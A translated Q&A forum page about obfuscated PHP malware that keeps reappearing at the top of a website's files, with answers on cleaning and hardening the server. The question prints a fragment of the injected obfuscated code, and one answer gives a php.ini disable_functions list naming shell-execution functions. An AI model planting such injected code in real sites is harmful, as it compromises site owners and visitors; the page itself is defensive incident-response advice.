PHP模糊不清" Dodgy"代码出现在我的网站上

时间:2018-01-03 16:25:51

标签: php malware

我在我的php文件中找到了这个:

<?php $glsaucbk = '5    156 x61"])))) { $GLOBALS["  ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO  x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4  x223}!+!<+{e%+*!*+fe4y4 x24-    x24]y8  x24-    x24]26  x24-        x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/

它在文件的头上...... 我试图删除它,但直接删除它的reapear。 我有一个PHP探测器,并说我DodgyPHP。 你有没有在你的php文件上有这个恶意代码?

2 个答案:

答案 0 :(得分:2)

我认为你不需要知道的事情比你已经知道的更多:

  • 你没有希望在那里的代码。
  • 它显然是混淆的;很少有理由混淆以外的PHP 来隐藏恶意代码。
  • 删除它时会重新出现,这意味着还有其他恶意脚本正在运行并自行修复。

你应该至少

  1. 立即使网站脱机。它可能会感染其他人,或用于您帐户的犯罪活动。
  2. 如果这是第三方应用程序(例如Wordpress,PHPBB等),请使用最新版本从头开始重新安装,只使用保持最新的知名插件。如果是您编写的代码,则需要审核其安全性,或者向专家付费才能执行此操作。
  3. 从备份中拯救您的数据,确保尽最大努力在妥协之前从备份,并将其应用于干净安装的网站。

答案 1 :(得分:2)

虽然不是直接的答案;这将是如何清理系统的有用步骤指南。

症状表明您的系统肯定遭到黑客攻击,并且仍然是可以攻击的。

您需要点击http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/中的链接,并采取重要措施从未来的黑客中加强您的系统:

  • 确保运行Web服务器进程的用户标识对其所服务的文件没有写入权限。您可以使用ps aux | grep apacheps aux | grep nginx查找运行Web服务器的用户ID。确保文件不归该用户所有。您可以通过sudo -u <that userid> touch /path/to/web/files/some_test_file之类的操作来检查权限。如果成功创建了一个文件,那么就会出现问题,需要调整权限。
  • 更改所有密码
  • 停止使用FTP,使用FTPS或SFTP。
  • 将您的PHP更新到最新的当前版本。
    • 将任何PHP CMS程序(Joomla,WordPress等)更新到最新版本。
  • 在检查了某些未被黑客攻击的备份后,从备份中重新加载数据。

  • 编辑你的php.ini并禁用危险函数(例如exec)和类:

     disable_functions = "exec,passthru,shell_exec,system,proc_open,popen, 
                      curl_multi_exec,parse_ini_file,show_source"
  • 编辑您的php.ini,请务必检查您的auto_prepend_fileauto_append_file值是否为预期值或空白。
  • 为数据库和服务器访问设置新的用户名。停止使用Root。切勿使用Root访问任何内容。
  • 检查服务器上运行的and prevent无法识别的cron_jobs
  

注意: 其他知道添加和编辑此帖子的人可以添加更多有用的指南和信息。可能是未来读者的好资源。

相关问题
最新问题